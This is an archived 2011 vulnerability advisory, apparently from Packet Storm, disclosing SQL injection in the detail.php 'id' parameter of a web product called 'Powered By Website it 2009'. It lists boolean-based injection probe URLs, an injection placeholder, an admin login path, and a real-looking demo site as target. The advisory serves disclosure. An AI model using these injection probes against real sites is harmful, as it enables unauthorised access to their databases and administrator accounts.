Powered By Website It SQL Injection

2011-08-02T00:00:00
ID PACKETSTORM:103670
Type packetstorm
Reporter Izam
Modified 2011-08-02T00:00:00

Description

                                        
                                            `<------------------- header data start ------------------- >  
  
#############################################################  
Powered By Website it 2009 © SQL Injection Vulnerability  
#############################################################  
  
[!] Author : Err0r ~ Bug Researchers  
  
[#] Date : 17.07.2011  
  
[#] Name : Powered By Website it 2009 ©  
  
[!] Bug Type : SQL Injection Vulnerability  
  
[#] Fixed : harmful characters fix - whitelist  
  
[#] Demo : http://www.opp-ti.sy  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
[+] Demo: http://localhost/[PATH]/detail.php?id=id AND 1=1  
  
http://localhost/[PATH]/detail.php?id=id AND 1=2  
  
http://localhost/[PATH]/detail.php?id=[Injection]  
  
Login : victim/admin  
  
< -- bug code end of -- >  
`